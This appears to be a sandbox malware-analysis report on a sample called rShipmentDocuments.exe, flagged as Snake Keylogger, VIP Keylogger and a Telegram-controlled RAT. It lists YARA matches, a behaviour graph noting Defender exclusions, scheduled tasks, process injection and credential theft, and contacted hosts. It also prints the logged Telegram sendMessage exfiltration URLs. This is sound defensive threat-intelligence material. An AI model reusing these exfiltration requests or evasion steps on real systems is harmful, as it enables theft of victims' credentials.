Source: Yara match File source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZOlmYtPdlO.exe PID: 8136, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZOlmYtPdlO.exe PID: 8136, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1531471 Sample: rShipmentDocuments.exe Startdate: 11/10/2024 Architecture: WINDOWS Score: 100 50 reallyfreegeoip.org 2->50 52 api.telegram.org 2->52 54 2 other IPs or domains 2->54 62 Multi AV Scanner detection for domain / URL 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 72 12 other signatures 2->72 8 rShipmentDocuments.exe 7 2->8         started        12 ZOlmYtPdlO.exe 2->12         started        signatures3 68 Tries to detect the country of the analysis system (by using the IP) 50->68 70 Uses the Telegram API (likely for C&C communication) 52->70 process4 file5 42 C:\Users\user\AppData\...\ZOlmYtPdlO.exe, PE32 8->42 dropped 44 C:\Users\...\ZOlmYtPdlO.exe:Zone.Identifier, ASCII 8->44 dropped 46 C:\Users\user\AppData\Local\...\tmp44A0.tmp, XML 8->46 dropped 48 C:\Users\user\...\rShipmentDocuments.exe.log, ASCII 8->48 dropped 74 Uses schtasks.exe or at.exe to add and modify task schedules 8->74 76 Adds a directory exclusion to Windows Defender 8->76 14 rShipmentDocuments.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        30 2 other processes 8->30 78 Multi AV Scanner detection for dropped file 12->78 80 Machine Learning detection for dropped file 12->80 82 Injects a PE file into a foreign processes 12->82 22 ZOlmYtPdlO.exe 12->22         started        24 schtasks.exe 12->24         started        26 ZOlmYtPdlO.exe 12->26         started        28 ZOlmYtPdlO.exe 12->28         started        signatures6 process7 dnsIp8 56 api.telegram.org 149.154.167.220, 443, 49767, 49773 TELEGRAMRU United Kingdom 14->56 58 185.230.141.85, 21, 49203, 49204 HostingvpsvilleruRU Russian Federation 14->58 60 2 other IPs or domains 14->60 84 Loading BitLocker PowerShell Module 18->84 32 conhost.exe 18->32         started        34 WmiPrvSE.exe 18->34         started        36 conhost.exe 20->36         started        86 Tries to steal Mail credentials (via file / registry access) 22->86 88 Tries to harvest and steal browser information (history, passwords, etc) 22->88 38 conhost.exe 24->38         started        40 conhost.exe 30->40         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
185.230.141.85
 unknown Russian Federation
59504 HostingvpsvilleruRU true
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
132.226.247.73
 checkip.dyndns.com United States
16989 UTMEMUS false

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.96.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 132.226.247.73 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:30:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		unknown
    http://checkip.dyndns.org/ false
    • URL Reputation: safe
    		 unknown
    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:40:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
      		unknown
      https://reallyfreegeoip.org/xml/8.46.123.33 false
      • URL Reputation: safe
      		 unknown